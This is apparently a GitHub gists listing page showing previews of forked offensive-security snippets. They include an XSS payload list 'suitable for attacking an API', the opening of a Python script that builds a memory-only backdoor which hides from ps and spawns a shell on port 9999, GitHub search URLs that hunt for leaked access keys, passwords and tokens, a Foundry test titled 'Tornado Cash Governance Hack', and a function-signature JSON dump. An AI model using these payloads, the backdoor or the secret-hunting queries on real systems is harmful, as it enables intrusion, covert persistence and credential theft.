Toufik Airane toufik-airane
toufik-airane
/ 666_lines_of_XSS_vectors.html
Created
May 16, 2016 20:54
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
toufik-airane
/ pypest.py
Created
September 29, 2016 10:23
— forked from epinna/pypest.py
Hackish one-liner memory-only backdoor agent which hides from ps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # This script prints a simple one-liner memory-only backdoor agent which hides from ps. | |
| # It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite | |
| # and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the | |
| # process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre) | |
| template = """ | |
| import sys,re,pty,os,socket |
toufik-airane
/ auto_git_query
Created
August 29, 2019 09:00
— forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
toufik-airane
/ CreateSelfdestruct.sol
Created
May 25, 2023 23:52
— forked from MerlinEgalite/CreateSelfdestruct.sol
Tornado Cash Governance Hack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity >=0.8.0; | |
| import "forge-std/Test.sol"; | |
| import "forge-std/console2.sol"; | |
| contract ContractA { | |
| function destroy() public { | |
| selfdestruct(payable(0)); | |
| } |
toufik-airane
/ function_signatures.json
Created
February 2, 2024 10:27
— forked from pleasemarkdarkly/function_signatures.json
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"43ea0313": ["setRitualFee(uint256)"], "270d13fb": ["isCoinIdUnique(uint16)"], "aec77b63": ["returnTokensInPool(address[],uint256[])"], "2442cfec": ["putBtoWithStc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)"], "010afc20": ["claimWrappedContractAdmin()"], "6165234c": ["setPermissions(address,bool)"], "cd63d930": ["distributionCap()"], "2302c948": ["EtherDank()"], "b0dc63eb": ["startWineryProductByRegulator(string,string,string,string,int256)"], "ad62bda5": ["setRoundLength(uint32)"], "03976b0e": ["setBattleProviderAddress(address,address)"], "bb11ed7e": ["rescueTokensInMultiplePolls(uint256[])"], "d82ce857": ["getPI_edit_26()"], "f0adda7d": ["setNextVersionAddress(address)"], "17753c44": ["DIGTREX()"], "6d78a434": ["IntegrativeWalletToken(uint256,uint256,uint256,address)"], "f5da16e9": ["RECHToken()"], "12192b00": ["getInitialHP(uint64,uint64,uint64)"], "71e3fdc4": ["moveMintTokens(address,address,uint256)"], "9304ddc8": ["setUnitCreationFee(uint256)"], "5142ba74": ["rollov |